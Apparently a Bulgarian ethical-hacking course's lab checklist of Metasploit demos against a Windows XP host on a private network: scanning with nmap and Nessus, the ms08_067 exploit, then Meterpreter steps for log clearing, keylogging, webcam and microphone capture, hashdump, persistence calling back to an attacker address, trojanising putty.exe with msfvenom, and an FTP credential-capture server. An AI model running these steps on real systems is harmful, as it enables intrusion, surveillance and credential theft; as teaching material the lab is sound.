### Демонстрация 1

- 1. service postgresql start
- 2. msfupdate
- 3. msfdb init
- 4. cat /usr/share/metasploit-framework/config/database.yml
- 5. msfconsole
  - a. db\_status
  - b. db\_rebuild\_cache
  - c. help

#### Демонстрация 2

- 1. msfconsole
  - a. db nmap -T4 -A -v 192.168.1.122
  - b. hosts
  - c. services

### Демонстрация 3

- 1. Сканиране с Nessus GUI на 192.168.1.122
- 2. Създаване на политика
- 3. Експортиране на резултата
- 4. msfconsole
  - a. db\_import /root/XP\_Scan\_\_Ethical\_Hacking\_\_5e9edg.nessu
  - b. hosts -c address,svcs,vulns
  - c. vulns
- 5. msfdb init

#### Демонстрация 4

- 1. msfconsole
  - a. load nessus
  - b. nessus\_help
  - c. nessus\_connect alex:alex@127.0.0.1
  - d. nessus\_policy\_list
  - e. nessus\_scan\_new
  - f. nessus\_scan\_new ad629e16-03b6-8c1d-cef6-ef8c9dd3c658d24bd260ef5f9e66
    XP\_scan\_example XP\_scan\_description 192.168.1.122
  - g. nessus\_scan\_list
  - h. nessus\_scan\_launch
  - i. nessus\_scan\_launch #
  - j. nessus\_report\_hosts #
  - k. nessus\_db\_import #
  - l. vulns

#### Демонстрация 5

- 1. msfconsole
  - a. search netapi
  - b. use exploit/windows/smb/ms08\_067\_netapi
- 2. show options
- 3. set RHOST 192.168.1.122
- 4. show options
- 5. exploit

#### Демонстрация 6

1. ps 2. ps -S explorer.exe 3. migrate 4. run post/windows/gather/forensics/duqu check 5. run post/ TABx2 6. pwd 7. cd  $\rightarrow$  Desktop 8. mkdir HACKED **ПРОВЕРКА** 9. rmdir HACKED 10. Създаване на ТХТ файл 11. cat .txt 12. edit.txt 13. download .txt 14. rm .txt 15. search -f hosts. 16. edit hosts. 17. show mount 18. arp 19. netstat 20. Route 21. route add 10.0.0.0 255.0.0.0 11.11.11.11 22. route delete 10.0.0.0 255.0.0.0 11.11.11.11 23. Getproxy 24. Portfwd 25. Sysinfo Execute -f notepad.exe 26. 27. Пускане на пасианс 28. Ps -S solitaire 29. Kill # 30. Getprivs 31. Проверка на логовете (Event Viewer) 32. Clearev 33. Проверка на логовете (Event Viewer) 34. reg enumkey -k HKEY LOCAL MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN 35. reg setval -K reg enumkey -k HKEY LOCAL MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN -v hackedAPP -d c:\\hacked.exe 36. Regedit Проверка 37. reg deleteval -k HKEY LOCAL MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN -v hackedAPP 38. Shell 39. Getsystem 40. Idletime 41. Screenshot 42. Keyscan start 43. TEKCT 44. Keyscan dump

45. Keyscan\_stop

- 46. Uictl —h
- 47. uictl disable mouse
- 48. uictl enable mouse
- 49. Record\_mic -h
- 50. record\_mic -d 10 -f /root/EH\_XP.wav -p false
- 51. Webcam\_list
- 52. Webcam\_snap
- 53. webcam\_stream
- 54. Webcam\_chat
- 55. Hashdump
- 56. run persistence –h
- 57. run persistence -U -i 5 -p 443 -r 192.168.1.116
- 58. reboot

## Демонстрация 7

- 1. Download putty.exe -> /root
- 2. msfvenom -a x86 --platform windows -k -p windows/messagebox TEXT="ETHICAL HACKING!" -f
  exe -x /root/putty.exe -o putty1.exe

## Демонстрация 8

1. Armitage

# Демонстрация 9

- 1. msfconsole
  - a. use auxiliary/server/capture/ftp
  - b. set SRVHOST 192.168.1.116
  - c. run
- 2. FTP -> 192.168.1.214